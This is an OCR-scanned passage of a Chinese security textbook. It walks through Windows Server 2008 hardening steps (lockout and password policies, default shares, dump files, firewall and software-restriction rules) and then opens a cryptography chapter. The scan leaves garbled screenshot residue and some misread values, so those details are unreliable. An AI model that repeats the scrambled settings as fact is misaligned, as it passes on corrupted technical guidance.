间 长 短 , 可 以 有 效 地 防止 字典 式 攻击 ,其 设置 如 图 3-8 所 示 , 这 部 分 包含 以 下 三 个 方面 。 
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图 3-8 ”账户 锁定 策略 的 设置 


1) 账户 锁定 时 间 

该 安全 设置 确定 锁定 的 账户 在 自动 解锁 前 保持 锁定 状态 的 分 钟 数 。 有 效 范围 为 0 一 
99 999 分 钟 。 如 果 将 账户 锁定 时 间 设 置 为 0, 那么 在 管理 员 明 确 将 其 解锁 前 ,该 账户 将 被 锁 
定 。 如 果 定 义 了 账户 锁定 阔 值 , 则 账户 锁定 时 间 必 须 大 于 或 等 于 重 置 时 间 。 

默认 值 : 无 。 因 为 只 有 当 指定 了 账户 锁定 阔 值 时 ,该 策略 设置 才 有 意义 。 

2) 账户 锁定 阔 值 

该 安全 设置 确定 造成 用 户 账户 被 锁定 的 登录 失败 尝试 的 次 数 。 无 法 使 用 锁定 的 账户 ， 
除非 管理 员 进行 了 重新 设置 或 该 账户 的 锁定 时 间 已 过 期 。 登 录 尝 试 失败 的 范围 可 设置 为 
0 一 999 之 间 。 如 果 将 此 值 设 为 0, 则 将 无 法 锁定 账户 。 

对 于 使 用 Ctrl 十 Alt 十 Delete 组 合 键 或 带 有 密码 保护 的 屏幕 保护 程序 锁定 的 工作 站 或 
成 员 服 务 器 计算 机 上 ,失败 的 密码 尝试 计 入 失败 的 登录 尝试 次 数 中 。 

默认 值 : 0。 

3) 复位 账户 锁定 计数 器 

该 安全 设置 确定 在 登录 尝试 失败 计数 器 被 复位 为 0( 即 0 次 失败 登录 尝试 ) 之 前 ,尝试 
登录 失败 之 后 所 需 的 分 钟 数 。 有 效 范 围 为 1 一 99 999 分 钟 。 

如 果 定 义 了 账户 锁定 阔 值 , 则 该 复位 时 间 必 须 小 于 或 等 于 账户 锁定 时 间 。 

默认 值 : 无 。 因 为 只 有 当 指定 了 * 账 户 锁定 阔 值 ?时 ,该 策略 设置 才 有 意义 。 

与 “锁定 ?字段 相同 ,设置 该 字段 值 时 也 应 考虑 到 安全 需求 与 有 效用 户 访问 需求 之 间 的 
平衡 。 最 好 设置 为 1 一 2 小 时 。 该 等 待 时 间 应 足够 长 ,足以 强制 黑客 必须 等 待 一 个 长 于 他 们 
所 希望 的 时 间 段 后 才能 再 次 尝试 登录 。 

8. 开启 密码 策略 

密码 对 系统 安全 非常 重要 。 本 地 安全 设置 中 的 密码 策略 在 默认 的 情况 下 都 没有 开启 ， 
包括 : 密码 长 度 最 小 值 ,密码 最 长 使 用 期 限 ,密码 最 短 使 用 期 限 ,强制 密码 历史 记录 ,使 用 可 
还 原 的 加 密 存储 密码 ,密码 必须 符合 复杂 性 要 求 ,设置 的 结果 如 图 3-9 所 示 。 

(1) 强制 密码 历史 记录 : 防止 用 户 创建 与 他 们 的 当前 密码 或 最 近 使 用 的 密码 相同 的 新 
密码 。 若 要 指定 记 住 多 少 个 密码 ,请 提供 一 个 值 。 例 如 , 值 为 1 表示 仅 记 住 上 一 个 密码 , 值 
为 5 表示 记 住 前 5 个 密码 ,使 用 大 于 1 的 数字 。 
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图 3-9 密码 策略 的 设置 


(2) 密码 最 长 使 用 期 限 : 设置 密码 有 效 天 数 的 最 大 值 。 在 此 天 数 后 ,用 户 将 必须 更 改 
密码 。 可 设置 70 天 的 最 长 密码 使 用 期 限 。 将 天 数值 设置 得 太 高 将 给 黑客 破解 密码 提供 延 
长 窗口 的 机 会 ; 将 天 数值 设置 得 太 低 将 干扰 用 户 ,因为 必须 频繁 地 更 改 密码 。 

(3) 密码 最 短 使 用 期 限 : 设置 在 可 以 更 改 密码 前 必须 通过 的 最 短 天 数 。 将 密码 最 短 使 
用 期 限 设置 为 至 少 一 天 。 通 过 这 样 做 ,将 要 求 用 户 一 天 只 能 更 改 一 次 密码 ,这 将 有 助 于 强制 
使 用 其 他 设置 。 例 如 ,如 果 记 住 了 过 去 的 5 个 密码 ,将 确保 在 用 户 可 以 重新 使 用 他 们 的 原始 
密码 前 ,必须 至 少 经 过 5 天 。 如 果 将 密码 最 短 使 用 期 限 设置 为 0, 则 用 户 可 以 一 天 更 改 
6 次 密码 ,并且 在 同一 天 就 可 以 开始 重新 使 用 其 原始 密码 。 

(4) 密码 长 度 最 小 值 : 指定 密码 可 以 具有 的 最 少 字符 数 。 将 密码 设置 为 介 于 8 一 12 个 
字符 之 间 ( 假 设 它们 也 符合 复杂 性 要 求 )。 较 长 的 密码 比较 短 的 密码 更 难 破解 (假定 密码 不 
是 一 个 单词 或 普通 短语 )。 但 是 ,如 果 不 担心 办 公 室 或 家 中 的 人 使 用 自己 的 计算 机 , 则 不 
使 用 密码 比 使 用 容易 猜 到 的 密码 能 够 更 好 地 保护 计算 机 不 受 黑客 从 Internet. 或 其 他 网 络 
攻击 的 侵害 。 如 果 不 使 用 密码 , Windows 将 自动 防止 任何 人 从 Internet 或 其 他 网 络 登录 
到 自己 的 计算 机 。 

(5) 密码 必须 符合 复杂 性 要 求 ,要求 密码 : 

CD 不 能 包含 用 户 的 账户 名 ,不 能 包含 用 户 姓名 中 超过 两 个 连续 字符 的 部 分 至 少 有 6 个 
字符 长 ; 

O 包含 以 下 四 类 字符 中 的 三 类 字符 : 英文 大 写字 母 (A 一 Z) .英文 小 写字 母 (a 一 2)、 
10 个 基本 数字 (0 一 9)， 

@ 非 字 母 字 符 ( 例 如 !、$ 、# 、%); 

CD 在 更 改 或 创建 密码 时 执行 复杂 性 要 求 。 

启用 此 设置 。 这 些 复杂 性 要 求 可 以 帮助 创建 强 密码 。 

(6) 使 用 可 还 原 的 加 密 存 储 密码 : 存储 密码 而 不 对 其 加 密 ,除非 使 用 的 程序 要 求 这 样 ， 
否则 不 要 使 用 此 设置 。 

9. 关闭 默认 共享 

Windows Server 安装 以 后 ,系统 会 创建 一 些 隐藏 的 共享 ,可 以 在 DOS 提示 符 下 输入 命 
4 net share 查看 ,如 图 3-10 所 示 。 
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禁止 这 些 共 享 ,打开 “管理 工具 ”一 “计算 机 管理 ?一 “共享 文件 夹 ”~ 共享”, 在 相应 的 共 


享 文件 夹 上 单 击 右 键 ,选择 “停止 共享 ” 即 可 ,如 图 3-11 所 示 。 


文件 F) REN FEV 帮助 00 
esama 

S 计算 机 管理 本 地 ) aE 
gl 系统 工具 国 ADMINS C:\Windows Windows 
田 @ 任务 计划 程序 cs C: Yindows 
m 图 事件 查看 器 
日 国 共享 文件 夫 
LT. i Ere 
m) 会 话 所 有 任务 K) > 
gi 打开 文件 S 
& di 本 地 用 户 和 组 oo 
a Gp 可 靠 性 和 性 能 Eta 
FRAL] 

B gs 

. mb 磁盘 管理 zll 
| 停止 共享 所 选 的 文件 来 


3-11 停止 共享 的 设置 


10. 禁用 Dump 文件 

在 系统 崩溃 和 蓝屏 的 时 候 , Dump 文件 是 一 份 很 有 用 的 资料 ,可 以 帮助 查找 问题 。 然 
而 , 它 也 能 够 给 黑客 提供 一 些 敏感 信息 ,比如 一 些 应 用 程序 的 密码 等 。 需 要 禁止 它 时 ,打开 
“控制 面板 ”>“ 系 统 属性 ”一 “高 级 ”一 “启动 和 故障 恢复 ”把 * 写 入 调试 信息 ” 改 成 “无 ”, 如 
图 3-12 所 示 。 

11. 关机 时 清除 文件 

页 面 文件 也 就 是 调度 文件 ,是 Windows 2000 用 来 存储 没有 装 人 内 存 的 程序 和 数据 文 
件 部 分 的 隐藏 文件 。 一 些 第 三 方程 序 可 以 把 一 些 没有 加 密 的 密码 存在 内 存 中 ,页 面 文件 中 
可 能 含有 另外 一 些 敏感 的 资料 。 要 在 关机 的 时 候 清 除 页 面 文件 ,可 以 编辑 注册 表 ,修改 主键 
HKEY LOCAL MACHINE 下 的 子 键 : 


SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 


把 ClearPageFileAtShutdown 的 值 设 置 成 1, 如 图 3-13 所 示 。 
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启动 和 故障 恢复 


3-12 禁用 Dump 文件 


i3 EI LI 


-时 Configuration = 
DOS Devices 


图 3-13 关机 时 清除 文件 的 设置 


12. 限制 使 用 迅雷 进行 恶意 下 载 


在 多 人 共同 使 用 同一 台 计 算 机 进行 工作 时 ,我 们 肯定 不 希望 普通 用 户 随意 使 用 迅雷 工 
具 进 行 恶意 下 载 , 这 样 不 但 容易 浪费 本 地 系统 的 磁盘 空间 资源 ,而 且 也 会 大 大 消耗 本 地 系统 
上 的 网 带宽 资源 。 而 在 Windows Server 2008 系统 环境 下 ,限制 普通 用 户 随 意 使 用 迅雷 工 
具 进 行 恶 意 下 载 的 方法 有 很 多 ,例如 ,可 以 利用 Windows Server 2008 系统 新 增加 的 高 级 安全 
防火 墙 功 能 ,或 者 通过 限制 下 载 端口 等 方法 来 实现 上 述 控制 目的 ,其 实 除了 这 些 方法 外 ,还 可 
以 巧妙 地 利用 该 系统 的 软件 限制 策略 来 达到 这 一 目的 ,下 面 就 是 该 方法 的 具体 实现 步骤 。 

首先 以 系统 管理 员 权 限 登 录 进 入 Windows Server 2008 系统 ,打开 该 系统 的 “开始 ” 菜 
单 ,从 中 选择 “运行 ”命令 ,在 弹出 的 “运行 "文本 框 中 ,输入 “gpedit. msc” 字 符 串 命令 ,进入 对 
应 系统 的 组 策略 控制 台 窗 口 。 
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其 次 在 该 控制 台 窗口 的 左 侧 位 置 处 ,依次 选中 “计算 机 配置 ">“Windows 设置 ">“ 安 
全 设置 ">“ 软 件 限制 策略 ”选项 ,同时 用 鼠标 右 击 该 选项 ,并 执行 快捷 菜单 中 的 “创建 软件 限 
制 策 略 ” 命 令 。 

接着 在 对 应 “软件 限制 策略 ”选项 的 右 侧 显 示 区 域 ,双击 “强制 ”组 策略 项 目 ,在 打开 的 设 
置 对 话 框 中 选中 其 中 的 “ 除 本 地 管理 员 以 外 的 所 有 用 户 ” 选 项 ,其 余 参 数 都 保持 默认 设置 , 青 
单 击 “ 确 定 ” 按 钮 结束 上 述 设置 操作 。 

下 面 选 中 “软件 限制 策略 ” 结 点 下 面 的 “其 他 规则 ”选项 ,再 用 鼠标 右 击 该 组 策略 选项 ,从 
弹出 的 快捷 菜单 中 选择 “新 建 路 径 规则 ”命令 ,在 其 后 出 现 的 设置 对 话 框 中 , 单 击 “ 浏 览 ” 按 钮 
选中 迅雷 下 载 程序 ,同时 将 对 应 该 应 用 程序 的 “安全 级 别 ?参数 设置 为 "不 允许 ”, 最 后 单 击 
“确定 ”按钮 执行 参数 设置 保存 操作 。 

重新 启动 Windows Server 2008 系统 , 当 用 户 以 普通 权限 账号 登录 进入 该 系统 后 ,普通 
用 户 就 不 能 正常 使 用 迅雷 程序 进行 恶意 下 载 了 ,不 过 当 我 们 以 系统 管理 员 权 限 进入 本 地 计 
算 机 系统 时 ,仍然 可 以 正常 运行 迅雷 程序 进行 随意 下 载 。 

13. 拒绝 网 络 病毒 藏 于 临时 文件 


现在 Internet. 上 的 病毒 疯狂 肆虐 ,一 些 “ 狭 独 ” 的 网 络 病毒 为 了 躲避 杀毒 软件 的 追 杀 ,往往 
会 想方设法 地 将 自己 隐藏 于 系统 临时 文件 夹 , 这 样 一 来 杀毒 软件 即使 找到 了 网 络 病毒 ,也 对 它 
无 可 奈何 ,因为 杀毒 软件 对 系统 临时 文件 夹 根本 无 权 * 指 手 画 脚 ”。 为 了 防止 网 络 病毒 隐藏 在 
系统 临时 文件 夹 中 ,可 以 按照 下 面 的 操作 设置 Windows Server 2008 系统 的 软件 限制 策略 。 

首先 打开 Windows Server 2008 系统 的 “开始 ”菜单 ,从 中 选择 “运行 ”命令 ,在 弹出 的 
“运行 ”对 话 框 中 ,输入 组 策略 编辑 命令 “gpedit. msc”, 单 击 “ 确 定 ” 按 钮 后 ,进入 对 应 系统 的 
组 策略 控制 台 窗 口 。 

其 次 ,在 该 控制 台 窗 口 的 左 侧 位 置 处 ,依次 选中 “计算 机 配置 ">“Windows WEE" E 
全 设置 ">“ 软 件 限 制 策 略 ”>“ 其 他 规则 ”选项 ,同时 用 鼠标 右键 单 击 该 选项 ,并 执行 快捷 菜 
单 中 的 “新 建 路 径 规 则 ”命令 ,打开 如 图 3-14 所 示 的 设置 对 话 框 ; 单 击 其 中 的 “浏览 ”按钮 ， 


新 建 路 径 规则 


"d 


图 3-14 将 “安全 级 别 ?参数 设置 为 “不 允许 的 ” 
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从 弹出 的 选择 文件 对 话 框 中 ,选中 并 导入 Windows Server 2008 系统 的 临时 文件 夹 ,同时 再 
将 “安全 级 别 ?参数 设置 为 “不 允许 的 ”, 最 后 单 击 * 确 定 ” 按 钮 保存 好 上 述 设置 操作 ,这 样 一 来 
网 络 病毒 日 后 就 不 能 躲藏 到 系统 的 临时 文件 夹 中 了 。 

14. 禁止 来 自 外 网 的 非法 ping 攻击 

巧妙 地 利用 Windows 系统 自 带 的 ping 命令 ,可 以 快速 判断 局 域 网 中 某 台 重要 计算 机 
的 网 络 连 通 性 ; 可 是 ,ping 命令 在 给 我 们 带 来 实用 性 的 同时 ,也 容易 被 一 些 恶意 用 户 所 利 
用 ,例如 ,恶意 用 户 要 是 借助 专业 工具 不 停 地 向 重要 计算 机 发 送 ping 命令 测试 包 时 ,重要 计 
算 机 系统 由 于 无 法 对 所 有 测试 包 进 行 应 答 , 从 而 容易 出 现 瘫痪 现象 。 为 了 保证 Windows 
Server 2008 服务 器 系统 的 运行 稳定 性 ,可 以 修改 该 系统 的 组 策略 参数 ,来 禁止 来 自 外 网 的 
非法 ping 攻击 。 

首先 ,以 特权 身份 登录 进入 Windows Server 2008 服务 器 系统 ,依次 选择 该 系统 桌面 上 
的 “开始 ”一 运行 ”命令 ,在 弹出 的 “运行 "对话 框 中 ,输入 字符 串 命令 “gpedit. msc”, 按 回 车 
键 后 ,进入 对 应 系统 的 控制 台 窗口 。 

其 次 ,选中 该 控制 台 左 侧 列表 中 的 “计算 机 配置 ? 结 点 选项 ,并 从 目标 结 点 下 面 逐 一 选择 
“Windows 设置 "“ 安 全 设置 "“ 高 级 安全 Windows 防火 墙 "“ 高 级 安全 Windows 防火 
墙 一 一 本 地 组 策略 对 象 ” 选 项 ,再 用 鼠标 选中 目标 选项 下 面 的 “入 站 规则 ”项 目 。 

接着 在 对 应 "入 站 规则 ”项 目 右 侧 的 “操作 ”列表 中 ,选择 “新 规则 ”选项 ,此 时 系统 屏幕 会 
自动 弹出 新 建 和 人 站 规则 向 导 对 话 框 ,依照 向 导 屏 幕 的 提示 , 先 将 * 自 定义 ?选项 选中 ,再 将 “所 
有 程序 ”项 目 选 中 ,之 后 从 “协议 类 型 "列表 中 选中 ICMPv4 ,如 图 3-15 所 示 。 

协议 和 端口 
指定 此 规则 匹 醒 的 协议 和 应 口 * 


58: 
* 规则 类 型 

LES 
Wi 
o 作用 域 

o 操作 

多 配置 文件 

* 名 称 


图 3-15 协议 类 型 选择 ICMPv4 


向 导 屏 幕 提 示 我 们 选择 什么 类 型 的 连接 条 件 时 ,可 以 选中 * 阻 止 连接 ?选项 ,同时 依照 实 
际 情况 设置 好 对 应 入 站 规则 的 应 用 环境 ,最 后 为 当前 创建 的 入 站 规则 设置 一 个 适当 的 名 称 。 
完成 上 面 的 设置 任务 后 ,将 Windows Server 2008 服务 器 系统 重新 启动 一 下 ,这 样 一 来 
Windows Server 2008 服务 器 系统 日 后 就 不 会 轻易 受到 来 自 外 网 的 非法 ping 测试 攻击 了 。 

小 提示 : 尽管 通过 Windows Server 2008 服务 器 系统 自 带 的 高 级 安全 防火 墙 功 能 可 以 
实现 很 多 安全 防范 的 目的 ,不 过 稍微 懂得 一 点 儿 技 术 的 非法 攻击 者 ,就 可 以 想 办 法 修改 防火 
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墙 的 安全 规则 ,那样 一 来 自行 定义 的 各 种 安全 规则 可 能 会 发 挥 不 了 任何 作用 。 为 了 阻止 非 
法 攻击 者 随意 修改 Windows Server 2008 服务 器 系统 的 防火 墙 安全 规则 ,可 以 进行 下 面 的 
设置 操作 。 

首先 打开 Windows Server 2008 服务 器 系统 的 “开始 ”菜单 ,选择 “运行 "命令 ,在 弹出 的 
“运行 ”文本 框 中 执行 “regedit” 字 符 串 命令 ,打开 系统 注册 表 控 制 台 窗口 ; 选中 该 窗口 左 侧 
显示 区 域 处 的 HKEY_LOCAL_MACHINE 选项 ,同时 从 目标 分 支 下 面 选中 SYSTEMV 
ControlSet001N Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules 注册 表 
子 项 ,该 子 项 下 面 保存 有 很 多 安全 规则 。 

其 次 ,打开 注册 表 控 制 台 窗口 中 的 “编辑 "下 拉 菜 单 , 从 中 选择 “权限 ”选项 ,打开 权限 设 
置 对 话 框 , 单 击 该 对 话 框 中 的 “添加 ”按钮 ,从 其 后 出 现 的 账号 选择 框 中 选中 Everyone 账号 ， 
同时 将 其 导入 进来 ; 再 将 对 应 该 账号 的 “完全 控制 "权限 调整 为 “拒绝 ”, 最 后 单 击 “ 确 定 ” 按 
钮 执行 设置 保存 操作 ,如 此 一 来 非法 用 户 日 后 就 不 能 随意 修改 Windows Server 2008 服务 
器 系统 的 各 种 安全 控制 规则 了 。 

15. 禁止 普通 用 户 随 意 上 网 访问 

通常 Windows Server 2008 系统 都 被 安装 到 重要 的 计算 机 中 ,为 了 防止 该 计算 机 系统 
受到 安全 威胁 ,往往 需要 想 办 法 限制 普通 用 户 在 该 系统 中 随意 上 网 访问 ; 但 是 如 果 简 单 关 
闭 该 系统 的 上 网 访问 权限 ,又 会 影响 特权 用 户 正常 上 网 ,那么 如 何 才能 限制 普通 用 户 上 网 ， 
而 又 不 影响 特权 用 户 进行 上 网 访问 呢 ? 其 实 很 简单 ,可 以 按照 下 面 的 操作 来 修改 Windows 
Server 2008 系统 的 组 策略 参数 。 

首先 ,以 普通 权限 的 账号 登录 Windows Server 2008 系统 ,打开 对 应 系统 中 的 IE 浏览 
器 窗口 , 单 击 其 中 的 “工具 ”菜单 项 ,从 下 拉 菜 单 中 选择 “Internet 选项 ”命令 ,弹出 Internet 
选项 设置 窗口 。 

其 次 ,选择 Internet 选项 设置 窗口 中 的 “连接 ”选项 卡 ,进入 连接 选项 设置 页 面 , 单 击 该 
设置 页 面 中 的 “局 域 网 设置 "按钮 ,选中 其 后 设置 页 面 中 的 “为 LAN 使 用 代理 服务 器 ”选项 ， 
青 任意 输入 一 个 代理 服务 器 的 主机 地 址 以 及 端口 号 码 , 青 单 击 “ 确 定 ” 按 钮 执行 参数 设置 保 
存 操作 。 

注销 Windows Server 2008 系统 , 换 用 具有 特殊 权限 的 用 户 账号 重新 登录 进入 
Windows Server 2008 系统 ,依次 选择 “开始 ”一 “运行 ”命令 ,在 其 后 出 现 的 系统 运行 框 中 输 
入 “gpedit. msc” 命 令 , 单 击 “ 确 定 ” 按 钮 后 ,进入 对 应 系统 的 组 策略 控制 台 窗 口 。 

选中 该 控制 台 窗口 左 侧 位 置 处 的 “计算 机 配置 ?选项 ,再 从 目标 结 点 下 面 依次 展开 “管理 
模板 ”>“Windows ZH fF"— Internet Explorer "Internet 控制 面板 ” 子 项 ,再 双击 目标 子 项 
下 面 的 “禁用 连接 页 ”组 策略 项 目 , 此 时 系统 屏幕 上 会 弹出 如 图 3-16 所 示 的 目标 组 策略 属性 
设置 对 话 框 ,选中 * 已 启用 ?选项 ,再 单 击 “确定 ”按钮 执行 设置 保存 操作 ,这样 一 来 ,普通 权限 
的 用 户 日 后 在 Windows Server 2008 系统 中 尝试 访问 网 络 时 ,IE 浏览 器 会 自动 连接 一 个 失 
效 的 代理 服务 器 ,那么 TE 浏览 器 自然 也 就 不 能 正常 显示 网 络 页 面 内 容 了 ; 而 具有 特殊 权限 
的 用 户 在 Windows Server 2008 系统 中 尝试 进行 网 络 访 问 时 ,IE 浏览 器 会 直接 显示 出 目标 
站 点 的 内 容 , 不 需要 通过 代理 服务 器 进行 中 转 。 

16. 断 开 远程 连接 恢复 系统 状态 


很 多 时 候 , 一 些 不 怀 好 意 的 用 户 往 往 会 同时 建立 多 个 远程 连接 ,来 消耗 Windows 
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图 3-16 禁用 连接 页 属性 设置 


Server 2008 服务 器 系统 的 宝贵 资源 ,最 终 达 到 搞 垮 服务 器 系统 的 目的 ; 为 此 ,在 实际 管理 
Windows Server 2008 服务 器 系统 的 过 程 中 ,一 旦 发 现 服务 器 系统 运行 状态 突然 不 正常 时 ， 
可 以 按照 下 面 的 办 法 强行 断 开 所 有 与 Windows Server 2008 服务 器 系统 建立 连接 的 各 个 远 
程 连接 ,以 便 及 时 将 服务 器 系统 的 工作 状态 恢复 正常 。 

首先 ,在 Windows Server 2008 服务 器 系统 桌面 中 依次 选择 “开始 ”>“ 运 行 ”选项 ,在 弹 
出 的 “运行 ”对话 框 中 ,输入 “gpedit. msc” 命 令 , 按 回 车 键 后 ,进入 目标 服务 器 系统 的 组 策略 
控制 台 窗口 。 

其 次 ,选中 组 策略 控制 台 窗口 左 侧 位 置 处 的 “用 户 配 置 ? 结 点 分 支 ,并 用 鼠标 逐一 选择 目 
标 结 点 分 支 下面 的 “管理 模板 ”>“ 网 络 ”>“ 网 络 连接 ”组 策略 选项 ,之 后 双击 “网 络 连接 ”分 
支 下 面 的 “删除 所 有 用 户 远程 访问 连接 ?选项 ,在 弹出 的 如 图 3-17 所 示 的 选项 设置 对 话 框 
中 ,选中 * 已 启用 ?选项 ,再 单 击 “确定 ”按钮 保存 好 上 述 设置 。 这 样 一 来 , Windows Server 
2008 服务 器 系统 中 的 各 个 远程 连接 都 会 被 自动 断 开 , 此 时 对 应 系统 的 工作 状态 可 能 会 立即 
恢复 正常 。 


LIIGLIAGALEi gi 


337 设置 删除 所 有 用 户 远 程 访 问 连接 为 “已 启用 ” 
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习题 


一 、 填空 题 
1. 可 以 免费 使 用 和 自由 传播 ,主要 用 于 基于 Intel x86 系列 CPU 的 计算 机 上 的 类 
UNIX 操作 系统 是 


2. 在 系统 崩溃 和 蓝屏 的 时 候 ， 文件 是 很 有 用 的 资料 ,可 以 帮助 查找 问题 。 
3. 查看 磁盘 和 文件 共享 的 命令 是 

4. 所 谓 的 陷阱 账号 是 创建 一 个 名 为 的 本 地 账号 ,把 它 的 权限 设置 成 最 低 。 
二 、 简 答题 


1. 简 述 Linux 安全 配置 方案 。 
2. 简 述 审核 策略 、 密 码 策略 和 账户 策略 的 含义 ,以 及 这 些 策略 如 何 保护 操作 系统 不 被 
AB. 


amo 密码 学 基础 


学 习 目 标 : 
n 掌握 密码 学 的 基本 概念 ,对 称 密 钥 加 密 和 公开 密 钥 加 密 技术 。 
n 掌握 数字 签名 和 数字 证 书 ,数字 水 印 技术 。 


4.1 密 m 学 


4.1.1 密码 学 概述 


密码 学 是 一 门 古老 而 深奥 的 学 科 , 它 对 一 般 人 来 说 是 陌生 的 ,因为 长 期 以 来 , 它 只 在 很 
小 的 范围 内 ,如 军事 .外 交 、 情 报 等 部 门 使 用 。 计 算 机 密码 学 是 研究 计算 机 信息 加 密 .解密 及 
其 变换 的 科学 ,是 数学 和 计算 机 科学 的 交叉 学 科 , 也 是 一 门 新 兴 的 学 科 。 随 着 计算 机 网 络 和 
计算 机 通信 技术 的 发 展 , 计 算 机 密码 学 得 到 前 所 未 有 的 重视 并 迅速 普及 和 发 展 起 来 。 在 国 
外 , 它 已 成 为 计算 机 安全 主要 的 研究 方向 ,也 是 计算 机 安全 课程 教学 中 的 主要 内 容 。 

密码 是 实现 秘密 通信 的 主要 手段 ,是 隐蔽 语言 .文字 、 图 像 的 特种 符号 。 凡 是 用 特种 符 
号 按照 通信 双方 约定 的 方法 把 电文 的 原形 隐蔽 起 来 ,不 为 第 三 者 所 识别 的 通信 方式 称 为 密 
码 通信 。 在 计算 机 通信 中 ,采用 密码 技术 将 信息 隐蔽 起 来 ,再 将 隐蔽 后 的 信息 传输 出 去 ,使 
信息 在 传输 过 程 中 即使 被 窃取 或 截获 ,窃取 者 也 不 能 了 解 信 息 的 内 容 , 从 而 保证 信息 传输 的 
安全 。 

任何 一 个 加 密 系 统 至 少 包括 下 面 4 个 组 成 部 分 。 

(1) 未 加 密 的 报 文 , 也 称 明文 。 

(2) 加 密 后 的 报 文 ,也 称 密 文 。 

(3) 加 密 解 密 设 备 或 算法 。 

COD 加 密 解 密 的 密 钥 。 

发 送 方 用 加 密 密 钥 ,通过 加 密 设 备 或 算法 ,将 信息 加 密 后 发 送出 去 。 接 收 方 在 收 到 密 文 
后 ,用 解密 密 钥 将 密 文 解密 ,恢复 为 明文 。 如 果 传 输 中 有 人 窃取 ,他 只 能 得 到 无 法 理解 的 密 
文 ,从 而 对 信息 起 到 保密 作用 。 


4.1.2 密码 的 分 类 


从 不 同 的 角度 根据 不 同 的 标准 ,可 以 把 密码 分 成 若干 类 。 

1l. 按 应 用 技术 或 历史 发 展 阶段 划分 

CD 手工 密码 。 以 手工 完成 加 密 作业 ,或 者 以 简单 器 具 辅 助 操作 的 密码 , 叫 作 手工 密 
码 。 第 一 次 世界 大 战 前 主要 是 这 种 作业 形式 。 

(2) 机 械 密码 。 以 机 械 密码 机 或 电动 密码 机 来 完成 加 解密 作业 的 密码 , 叫 作 机 械 密码 。 
这 种 密码 在 第 一 次 世界 大 战 中 出 现 , 到 第 二 次 世界 大 战 中 得 到 广泛 应 用 。 
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(3) 电子 机 内 乱 密码 。 通 过 电子 电路 ,以 严格 的 程序 进行 逻辑 运算 ,以 少量 制 乱 元 素 生 
产 大 量 的 加 密 乱 数 ,因为 其 制 乱 是 在 加 解密 过 程 中 完成 的 而 不 需要 预先 制作 ,所 以 称 为 电子 
机 内 乱 密码 。 从 20 世纪 50 年 代 末期 出 现 到 20 世纪 70 年 代 广 泛 应 用 。 

(4) 计算 机 密码 ,是 以 计算 机 软件 编程 进行 算法 加 密 为 特点 ,适用 于 计算 机 数据 保护 和 
网 络 通信 等 广泛 用 途 的 密码 。 

2. 按 保密 程度 划分 

CD 理论 上 保密 的 密码 。 不 管 获 取 多 少 密 文 和 有 多 大 的 计算 能 力 ,对 明文 始终 不 能 得 
到 唯一 解 的 密码 , 叫 作 理论 上 保密 的 密码 ,也 叫 理论 不 可 破 的 密码 。 如 客观 随机 一 次 一 密 的 
密码 就 属于 这 种 。 

(2) 实际 上 保密 的 密码 。 在 理论 上 可 破 ,但 在 现 有 客观 条 件 下 ,无 法 通过 计算 来 确定 唯 
一 解 的 密码 , 叫 作 实际 上 保密 的 密码 。 

(3) 不 保密 的 密码 。 在 获取 一 定数 量 的 密 文 后 可 以 得 到 唯一 解 的 密码 , 叫 作 不 保密 密 
码 。 如 早期 单 表 代替 密码 ,后 来 的 多 表 代替 密码 ,以 及 明文 加 少量 密 钥 等 密码 ,现在 都 称 为 
不 保密 的 密码 。 

3. 按 密 钥 方式 划分 

CD 对 称 式 密码 。 收 发 双方 使 用 相同 密 钥 的 密码 , 叫 作对 称 式 密码 。 传 统 的 密码 都 属 
于 此 类 。 

(2) 非 对 称 式 密码 。 收 发 双方 使 用 不 同 密 钥 的 密码 , 叫 作 非 对 称 式 密码 。 如 现代 密码 
中 的 公共 密 钥 密 码 就 属于 此 类 。 

4. 按 明文 形态 划分 

CD 模拟 型 密码 。 用 以 加 密 模拟 信息 。 如 对 动态 范围 之 内 连续 变化 的 语音 信号 加 密 的 
密码 , 叫 作 模拟 式 密 码 。 

COD 数字 型 密码 。 用 于 加 密 数 字 信 息 。 对 两 个 离散 电 平 构成 0、1 二 进 制 关系 的 电报 信 
息 加 密 的 密码 叫 作 数字 型 密码 。 

5. 按 编制 原理 划分 

可 分 为 移 位 .代替 和 置换 三 种 以 及 它们 的 组 合 形式 。 古 今 中 外 的 密码 ,不 论 其 形态 多 么 
繁杂 ,变化 多 么 巧妙 ,都 是 按照 这 三 种 基本 原理 编制 出 来 的 。 移 位 .代替 和 置换 这 三 种 原理 
在 密码 编制 和 使 用 中 相互 结合 ,灵活 应 用 。 


4.1.3 基本 功能 

数据 加 密 的 基本 思想 是 通过 变换 信息 的 表示 形式 来 伪装 需要 保护 的 敏感 信息 ,使 非 授 
权 者 不 能 了 解 被 保护 信息 的 内 容 。 网 络 安全 使 用 密码 学 来 辅助 完成 在 传递 敏感 信息 时 的 相 
关 问 题 ,主要 包括 以 下 几 点 。 

1. 机 密 性 

仅 有 发 送 方 和 指定 的 接收 方 能 够 理解 传输 的 报 文 内 容 。 窃 听 者 可 以 截取 到 加 密 了 的 报 
文 , 但 不 能 还 原 出 原来 的 信息 , 即 不 能 得 到 报 文 内 容 。 

2. 鉴别 

发 送 方 和 接收 方 都 应 该 能 证 实 通信 过 程 所 涉及 的 另 一 方 ,通信 的 另 一 方 确实 具有 他 们 
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所 声称 的 身份 。 即 第 三 者 不 能 冒充 跟 你 通信 的 对 方 ,能 对 对 方 的 身份 进行 鉴别 。 

3. 报 文 完整 性 

即使 发 送 方 和 接收 方 可 以 互相 鉴别 对 方 , 但 他 们 还 需要 确保 其 通信 的 内 容 在 传输 过 程 
中 未 被 改变 。 

4. 不 可 否认 性 

如 果 人 们 收 到 通信 对 方 的 报 文 后 ,还 要 证 实 报 文 确实 来 自 所 宣称 的 发 送 方 ,发 送 方 也 不 
能 在 发 送 报 文 以 后 否认 自己 发 送 过 报 文 。 


4.1.4 加 密 和 解密 


遵循 国际 命名 标准 ,加 密 和 解密 可 以 翻译 成 Encipher( 译 成 密码 ) 和 (Decipher)( 解 译 密 
码 )。 也 可 以 这 样 命名 : Encrypt( 加 密 ) 和 Decrypt( 解 密 ) 。 
消息 被 称 为 明文 。 用 某 种 方法 伪装 消息 以 隐藏 它 的 内 容 的 过 程 称 为 加 密 , 加 密 的 消息 
称 为 密 文 ,而 把 密 文 转 变 为 明文 的 过 程 称 为 解密 。 
明文 用 M(Message, 消 息 ) 或 PCPlaintext, 明 文 ) 表 示 , 它 可 能 是 比特 流 、 文 本 文件 、 位 
